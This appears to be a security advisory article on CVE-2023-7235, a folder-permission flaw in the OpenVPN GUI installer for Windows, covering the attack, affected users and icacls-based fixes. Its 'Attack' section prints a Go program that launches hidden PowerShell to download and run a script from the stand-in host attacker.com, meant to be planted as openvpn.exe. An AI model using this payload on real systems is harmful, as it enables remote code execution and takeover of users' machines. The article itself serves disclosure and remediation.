CVE-2023-7235 is a security vulnerability discovered in the OpenVPN GUI installer before version 2.6.9. When you install OpenVPN’s official GUI on Windows, and choose a custom (non-standard) installation folder, the installer fails to set the right permissions on its main binary directory. This oversight allows a local attacker to swap out trusted OpenVPN binaries with malicious executables — which are then run with the user’s privileges. If you’re using OpenVPN GUI on Windows, read on for details, technical walk-through, and patches.
Background: OpenVPN GUI and Why Permissions Matter
OpenVPN is one of the most popular open-source VPN software choices for privacy, remote work, and secure connections. The OpenVPN GUI is a Windows application that lets users manage and launch VPN profiles with a click, rather than through the command line.
Installers on Windows should always lock down their binary folders (like C:\Program Files\OpenVPN) so that regular users, or unprivileged processes, can’t just add or swap out files. If these protections aren’t set, malware or a rogue local user could drop evil programs into your VPN directory—programs OpenVPN might run without warning.
Vulnerability Description
CVE-2023-7235 affects versions of the OpenVPN GUI installer before 2.6.9.
If you use a custom install path (say, D:\Apps\OpenVPN-MyCustom instead of the default), the installer does not set restrictive permissions on the installation folder. This means any local user can write to it, swap out binaries, or plant new ones. The OpenVPN GUI then runs whatever binaries it finds there, assuming they’re safe.
In short: Local attackers can hijack your OpenVPN connection, intercept traffic, or escalate privileges — depending on what gets run and your environment.
Attack
1. Attacker (any process or user account with access to the system) discovers D:\OpenVPN\bin is world-writable:
Everyone: Full Control or similar.
2. Attacker overwrites or drops a new file named openvpn.exe in the bin directory. It could be malware, backdoor, or even a tool to open a reverse shell.
Here’s a demo malicious payload using Go (for demo—don’t use for evil)
package main
import (
"os/exec"
)
func main() {
// Open a reverse shell to attacker's server
cmd := exec.Command("powershell", "-NoP", "-NonI", "-W", "Hidden", "-C", "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1';)")
cmd.Run()
}
Compile it as openvpn.exe, drop it into the compromised install directory, and as soon as the OpenVPN GUI tries to start a VPN, the reverse shell runs.
Who Is at Risk?
- Anyone who installed OpenVPN GUI for Windows _before 2.6.9_ onto a custom path/directory (not the default C:\Program Files\OpenVPN).
- Multi-user machines, shared workstations, or systems where non-admin users have physical or RDP access.
Right-click the folder, go to Properties → Security.
3. Look for entries like Everyone: Full Control or any group/user that should not be able to write files.
How to Fix
Upgrade:
Download and install OpenVPN GUI version 2.6.9 or later.
Open a Command Prompt as Administrator and run
icacls "D:\OpenVPN" /inheritance:r /grant:r "Administrators:F" "System:F"
icacls "D:\OpenVPN" /remove "Users" "Everyone"
References and More Reading
- CVE-2023-7235 at MITRE/NVD
- OpenVPN Community Downloads: Changelog
- Initial OpenVPN GitHub Fix Commit
- OpenVPN CVEs List
Final Thoughts
While CVE-2023-7235 may sound minor, network tools like OpenVPN are prime targets. If an attacker can run their own code every time you connect, your VPN and privacy are gone. Always install security software in protected locations, update regularly, and check permissions, especially if sharing Windows systems with others.
Stay safe—patch fast!
*Article written exclusively for you. Feel free to share with your IT team or friends using OpenVPN on Windows!*
Timeline
Published on: 02/21/2024 11:15:07 UTC
Last modified on: 08/26/2024 17:35:02 UTC